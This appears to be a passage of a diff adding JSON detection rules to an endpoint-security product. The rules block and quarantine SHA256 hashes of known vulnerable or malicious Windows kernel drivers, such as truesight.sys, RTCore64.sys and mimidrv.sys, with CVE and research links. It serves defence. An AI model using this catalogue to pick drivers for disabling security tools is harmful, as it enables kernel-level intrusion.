+ "hl_testing_start_time": "2026-03-23T11:45:31.829441Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ad1486d7f98a6c3723196c246bf6997ccac65a46c2b0eb79ff638f594bb3193",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "068d19c5-1273-56a5-81df-8df7b3d9b6e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460437Z",
+ "creation_date": "2026-03-23T11:45:30.460440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460449Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7149fbd191d7e4941a32a3118ab017426b551d5d369f20c94c4f36ae4ef54f26",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "069b5c6f-9cdb-5e03-98cd-5b855cba23cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819289Z",
+ "creation_date": "2026-03-23T11:45:31.819293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d92522c737592f306d1361c32ff88470940dd28a81ff26ce464a65d5c6b0b80a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "069be0f5-50b9-564f-b101-2d441e5020eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814631Z",
+ "creation_date": "2026-03-23T11:45:31.814634Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814643Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0636235b2705c062810212da1f50ef48a53433ca1aa27ed04b65539d219769ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "069d944e-0a8c-56cc-872d-15d7966e0a0f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150269Z",
+ "creation_date": "2026-03-23T11:45:31.150271Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150276Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b36081d2fbb90148de42923ba0fef9165e92505fe39971eea9bb544db0ce6de6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06b1e1b0-b95d-5ed5-ba98-c64b2146cf0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152010Z",
+ "creation_date": "2026-03-23T11:45:31.152013Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152021Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a5c065d6e28c1e2d58765df1753e0dbbd0d8270ee2eb777dfd33d76bf200b57",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06b39c46-093d-5e0f-aeaa-c7b862143f34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480151Z",
+ "creation_date": "2026-03-23T11:45:30.480153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5868cb3bf5d5a9237e29210218d3d93683c0e4894bc48685ac7d84a1e25e0462",
+ "comment": "Vulnerable Kernel Driver (aka IoAccesssys.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06b75643-0b71-58c6-a3d7-0dc1020a0b1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500814Z",
+ "creation_date": "2026-03-23T11:45:31.500817Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "875de01289c469352f683580a0bf2d0cb46ccb242eb78424956679b18842270e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06d7bad1-e0f4-590f-be2c-1f6e6ce0269c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154229Z",
+ "creation_date": "2026-03-23T11:45:31.154231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154236Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db31d8cc945c9871612d19f2db3b16f81fbd19efc0e710b37057f6153b4fb2c5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06da109a-4a6a-55fa-b81e-7187d7fbbe5a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816090Z",
+ "creation_date": "2026-03-23T11:45:31.816093Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816101Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b439a7f4cac2b13180a145873d791e2b6f71b2e10ef7117436a1ceae17bb733",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06ddbcd6-e4c7-5d2f-9d12-0028d34a86ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828383Z",
+ "creation_date": "2026-03-23T11:45:30.828385Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828391Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58db1e62698a87fda67b49fca76baca5b5991685b22565fb83e26edef5827997",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06e48ac1-5837-5653-807c-b98c17b3be68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611184Z",
+ "creation_date": "2026-03-23T11:45:29.611186Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611191Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0ed71b491aec860932fe92e5527ef444d537b396186ac839d5ed0884cfcaf0c",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06e5551b-cad2-5391-80ad-09213f824ab8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500682Z",
+ "creation_date": "2026-03-23T11:45:31.500685Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1327894d938cb090f79aff77edb58dab33244b4158f042852b9353f4ddec3697",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06ec01ee-9855-5b31-9063-8d347cdf93c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822998Z",
+ "creation_date": "2026-03-23T11:45:30.823000Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823005Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45e5977b8d5baec776eb2e62a84981a8e46f6ce17947c9a76fa1f955dc547271",
+ "comment": "Vulnerable Kernel Driver (aka SysInfoDetectorX64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "06f304f3-94d0-5ba8-a96b-9f91c7e15916",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828689Z",
+ "creation_date": "2026-03-23T11:45:31.828691Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828697Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43dce6bb47503971e9de906e464925e35e321fb409ad20d2dc27e45ddcfe6552",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0708b8a3-4bfe-5319-925f-0f7d1d2c45c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151229Z",
+ "creation_date": "2026-03-23T11:45:31.151231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151236Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a8989fd8122bea54c9912f1171658e29a7e4f4cd5d19f899d397a706deca8208",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0713656e-1889-5974-9456-84ca4212956f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608206Z",
+ "creation_date": "2026-03-23T11:45:29.608208Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608213Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7bd50bd6388e371414ed7d36238a60d30eaa7abf539fcf6d70617405f53a0133",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0719fb7b-da47-5076-84b9-b266312d34c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480144Z",
+ "creation_date": "2026-03-23T11:45:31.480148Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480156Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ba96a1e0c038852bef36e857e1cff58576f62e59d8248da0f133414f4f9451f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07225064-f2e3-5a1c-a966-079de817f649",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974486Z",
+ "creation_date": "2026-03-23T11:45:29.974488Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974494Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62d1ca62fb251b1eeda5d2577719414e6e26d4afdc5f3df3faf3b35de5cb9506",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0740f142-db65-5cd0-8ed3-229b2f429382",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146985Z",
+ "creation_date": "2026-03-23T11:45:32.146987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "011df46e94218cbb2f0b8da13ab3cec397246fdc63436e58b1bf597550a647f6",
+ "comment": "Vulnerable Kernel Driver (aka TPwSav.sys) [https://www.loldrivers.io/drivers/c0634ed7-840e-4a7e-8b34-33efe50405c2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0744783d-46d4-542e-8ba7-284a1e9397d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466748Z",
+ "creation_date": "2026-03-23T11:45:30.466752Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466761Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a5c08d40a5e73b9fe63ea5761eaec8f41d916ca3da2acbc4e6e799b06af5524",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0748a661-bbaa-54af-a1a9-1711c94c0919",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604682Z",
+ "creation_date": "2026-03-23T11:45:29.604683Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604689Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a234a2b8eb3844f7b5831ee048f88e8a76e9d38e753cc82f61b234c79fe1660",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "07522169-0903-5d7a-a258-9894793239db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613188Z",
+ "creation_date": "2026-03-23T11:45:29.613190Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70870e20f563899e4f05be2d0049cb495552b409ca7f4729a335bcbfffc3f47c",
